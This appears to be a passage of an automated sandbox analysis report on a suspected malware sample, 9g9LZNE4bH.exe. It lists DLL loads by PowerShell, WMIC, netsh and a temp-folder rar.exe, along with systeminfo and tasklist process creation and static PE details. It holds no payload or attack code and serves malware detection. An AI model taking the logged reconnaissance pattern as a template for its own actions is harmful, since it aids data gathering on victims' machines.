              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 9g9LZNE4bH.exe	Static PE information: Image base 0x140000000 > 0x60000000
Source: 9g9LZNE4bH.exe	Static file information: File size 7186035 > 1048576
Source: 9g9LZNE4bH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9g9LZNE4bH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9g9LZNE4bH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9g9LZNE4bH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9g9LZNE4bH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9g9LZNE4bH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 9g9LZNE4bH.exe	Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: 9g9LZNE4bH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2405833236.00007FF8A8450000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: 9g9LZNE4bH.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
